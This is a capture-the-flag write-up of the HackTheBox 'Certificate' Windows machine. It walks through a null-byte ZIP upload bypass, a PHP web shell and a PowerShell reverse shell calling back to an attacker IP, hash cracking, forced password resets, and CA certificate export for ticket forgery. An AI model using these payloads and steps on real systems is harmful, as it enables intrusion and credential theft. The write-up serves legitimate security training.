HackTheBox Certificate Writeup
A walkthrough of the HackTheBox 'Certificate' machine which is easy rated windows box. This write-up covers initial access, privilege escalation, and post-exploitation techniques.
RECONNAISSANCE
Nmap
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
┌──(dollarboysushil㉿kali)-[~/Documents/HTB_BOXES/certificate]
└─$ nmap -sC -sV 10.129.183.231
Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-01 03:00 EDT
Stats: 0:01:02 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 92.31% done; ETC: 03:01 (0:00:04 remaining)
Nmap scan report for 10.129.183.231
Host is up (0.27s latency).
Not shown: 987 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Apache httpd 2.4.58 (OpenSSL/3.1.3 PHP/8.0.30)
|_http-server-header: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
|_http-title: Did not follow redirect to http://certificate.htb/
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-06-01 15:00:32Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: certificate.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-06-01T15:01:58+00:00; +8h00m03s from scanner time.
| ssl-cert: Subject: commonName=DC01.certificate.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.certificate.htb
| Not valid before: 2024-11-04T03:14:54
|_Not valid after: 2025-11-04T03:14:54
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: certificate.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.certificate.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.certificate.htb
| Not valid before: 2024-11-04T03:14:54
|_Not valid after: 2025-11-04T03:14:54
|_ssl-date: 2025-06-01T15:01:57+00:00; +8h00m02s from scanner time.
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: certificate.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.certificate.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.certificate.htb
| Not valid before: 2024-11-04T03:14:54
|_Not valid after: 2025-11-04T03:14:54
|_ssl-date: 2025-06-01T15:01:58+00:00; +8h00m03s from scanner time.
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: certificate.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-06-01T15:01:57+00:00; +8h00m02s from scanner time.
| ssl-cert: Subject: commonName=DC01.certificate.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.certificate.htb
| Not valid before: 2024-11-04T03:14:54
|_Not valid after: 2025-11-04T03:14:54
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
Service Info: Hosts: certificate.htb, DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Lets enumerate the low hanging fruit first, i.e HTTP on Port 80
This challenge is currently active on HackTheBox.
In accordance with HackTheBox's content policy, this writeup will be made publicly available only after the challenge is retired.
For hints or to chat with the community, join the Dollar T.V Discord server
or send DM on Twitter (X) dollarboysushil.
Visiting the ip, redirects us to certificate.htb so add it to /etc/hosts.
Website certificate.htb is some kind of learning management system. This site has register and login feature, so lets create account and login.
After sign in, we have option to register to any of the courses.
After enrolling to any of the courses, we have option to upload and submit assignment. (Maybe file upload vulnerability.)
This website takes, .zip archive file with valid .pdf, .docx, .pptx or .xlsx file inside it.
At first I tried uploading normal zip file with sample pdf inside it, after uploading the zip, we got link to the uploaded .pdf file, so the webapp extracts the zip and gives us the location of .pdf stored.
With this info in mind, I tried to bypass file upload by using null byte and it worked. Here are the steps to do it.
Created a PHP reverse shell named shell.php.
- Compressed it into a ZIP archive using:
1
zip shell.zip shell.php
- Wrote a Python script to modify the filename inside the ZIP to shell.php\x00.pdf, attempting a null byte injection.
- Since null bytes (\x00) are not allowed in ZIP filenames or filesystems, the actual filename inside the new ZIP (shell2.zip) became:
1
shell.php .pdf
- Uploaded shell2.zip to the web application.
- The server extracted the file and saved it as:
1
shell.php .pdf
Python code
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
import zipfile
import os
zip_path = 'shell.zip'
new_zip_path = 'shell2.zip'
old_filename = 'shell.php'
new_filename = 'shell.php\x00.pdf'
with zipfile.ZipFile(zip_path, 'r') as zip_read:
with zipfile.ZipFile(new_zip_path, 'w') as zip_write:
for item in zip_read.infolist():
original_data = zip_read.read(item.filename)
# Rename the target file
if item.filename == old_filename:
item.filename = new_filename
zip_write.writestr(item, original_data)
print(f'Renamed {old_filename} to {new_filename} inside {new_zip_path}')
Content of shell.php
1
2
3
4
5
6
7
<?php
if(isset($_GET['cmd']))
{
system($_GET['cmd'] . ' 2>&1');
}
?>
After uploading the php file, we get url to the .php file on which we can try RCE.
To get reverse shell, I changed content of shell.php to
1
2
3
<?php
shell_exec("powershell -nop -w hidden -c \"\$client = New-Object System.Net.Sockets.TCPClient('10.10.15.16',9001); \$stream = \$client.GetStream(); [byte[]]\$bytes = 0..65535|%{0}; while((\$i = \$stream.Read(\$bytes, 0, \$bytes.Length)) -ne 0){; \$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString(\$bytes,0,\$i); \$sendback = (iex \$data 2>&1 | Out-String ); \$sendback2 = \$sendback + 'PS ' + (pwd).Path + '> '; \$sendbyte = ([text.encoding]::ASCII).GetBytes(\$sendback2); \$stream.Write(\$sendbyte,0,\$sendbyte.Length); \$stream.Flush()}; \$client.Close()\"");
?>
No I have access as user xamppuser
Upon further exploration, I found db.php inside C:\xampp\htdocs\certificate.htb
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
<?php
// Database connection using PDO
try {
$dsn = 'mysql:host=localhost;dbname=Certificate_WEBAPP_DB;charset=utf8mb4';
$db_user = 'certificate_webapp_user'; // Change to your DB username
$db_passwd = 'cert!f!c@teDBPWD'; // Change to your DB password
$options = [
PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION,
PDO::ATTR_DEFAULT_FETCH_MODE => PDO::FETCH_ASSOC,
];
$pdo = new PDO($dsn, $db_user, $db_passwd, $options);
} catch (PDOException $e) {
die('Database connection failed: ' . $e->getMessage());
}
?>
Using, the database credential found in this db.php, I logged into the database and dumped the content.
1
2
3
4
5
6
7
8
9
id first_name last_name username email password created_at role is_active
1 Lorra Armessa Lorra.AAA [email protected] $2y$04$bZs2FUjVRiFswY84CUR8ve02ymuiy0QD23XOKFuT6IM2sBbgQvEFG 2024-12-23 12:43:10 teacher 1
6 Sara Laracrof Sara1200 [email protected] $2y$04$pgTOAkSnYMQoILmL6MRXLOOfFlZUPR4lAD2kvWZj.i/dyvXNSqCkK 2024-12-23 12:47:11 teacher 1
7 John Wood Johney [email protected] $2y$04$VaUEcSd6p5NnpgwnHyh8zey13zo/hL7jfQd9U.PGyEW3yqBf.IxRq 2024-12-23 13:18:18 student 1
8 Havok Watterson havokww [email protected] $2y$04$XSXoFSfcMoS5Zp8ojTeUSOj6ENEun6oWM93mvRQgvaBufba5I5nti 2024-12-24 09:08:04 teacher 1
9 Steven Roman stev [email protected] $2y$04$6FHP.7xTHRGYRI9kRIo7deUHz0LX.vx2ixwv0cOW6TDtRGgOhRFX2 2024-12-24 12:05:05 student 1
10 Sara Brawn sara.b [email protected] $2y$04$CgDe/Thzw/Em/M4SkmXNbu0YdFo6uUs3nB.pzQPV.g8UdXikZNdH6 2024-12-25 21:31:26 admin 1
12 Sushil Poudel sushil [email protected] $2y$04$QQb9r7j09fjYLOFSf.x9Xe768MQSkRtvqt9KJ1W38TkYbi4nQK.Z. 2025-06-02 10:15:03 student 1
Among above password hash, I was able to crack hash of user sara.b using hashcat.
1
2
hashcat -m 3200 sara.b_hash /usr/share/wordlists/rockyou.txt
1
sara.b:Blink182
User.txt
Using credentail of sara.b user, I tried looking if there exist any intersing access in SMB share, but nothing interesting exist there.
Bloodhound
Using netexec’s bloodhound module I dumped the data of the domain and imported it into Bloodhound CE.
After little bit exploration in Bloodhound GUI, we can see user sara.b has generic all permission over tons of object.
Among those object, I focused on user lion.sk , using generic all permission, I force changed password of user lion.sk
1
net rpc password "TargetUser" "newP@ssword2022" -U "DOMAIN"/"ControlledUser"%"Password" -S "DomainController"
user lion.sk has access to winr-rm so, I logged in using evil-winrm and got user.txt
Privilege Escalation
This user, lion.sk has following permission.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
*Evil-WinRM* PS C:\Users\Lion.SK\Desktop> whoami /all
USER INFORMATION
----------------
User Name SID
=================== =============================================
certificate\lion.sk S-1-5-21-515537669-4223687196-3249690583-1115
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
========================================== ================ ============================================= ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Certificate Service DCOM Access Alias S-1-5-32-574 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
CERTIFICATE\Domain CRA Managers Group S-1-5-21-515537669-4223687196-3249690583-1104 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level Label S-1-16-8192
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
USER CLAIMS INFORMATION
-----------------------
User claims unknown.
Kerberos support for Dynamic Access Control on this device has been disabled.
There is nothing interesting here, I tried multiple priv esc techniques with this users but could not find the way. So I focused on another user.
Previously we saw, user sara.b has generic all permission over multiple objects, so I focused on another user ryan.k
Similarly as before, I force changed the password of Ryan.k and got winrm session.
This user has interesting permission compared to lion.sk
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
*Evil-WinRM* PS C:\Users\Ryan.K\Documents> whoami /all
USER INFORMATION
----------------
User Name SID
================== =============================================
certificate\ryan.k S-1-5-21-515537669-4223687196-3249690583-1117
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
========================================== ================ ============================================= ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Certificate Service DCOM Access Alias S-1-5-32-574 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
CERTIFICATE\Domain Storage Managers Group S-1-5-21-515537669-4223687196-3249690583-1118 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level Label S-1-16-8192
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ================================ =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeManageVolumePrivilege Perform volume maintenance tasks Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
USER CLAIMS INFORMATION
-----------------------
User claims unknown.
Kerberos support for Dynamic Access Control on this device has been disabled.
SeManageVolumePrivilege
A little bit of google search led me to this exploit SeManageVolumePrivilege.
Another intersting thing we can view in bloodhound CE is,
from DC01 we have GenericWrite + other permission over Certificate-ltd-ca
So, I downloaded the SeManageVolumePrivilege exploit, uploaded it to victim and ran it.
Using the exploit, I was able to export pfx key
1
certutil -exportPFX "Certificate-LTD-CA" ca.pfx
This is the golden certificate, using this certificate we can fully compromise the domain, we can can simply forge ticket for any users in the domian.
Lets, forge the ticket for administrator
With the NTLM hash of administrator, we can get winrm-session and grab the root.txt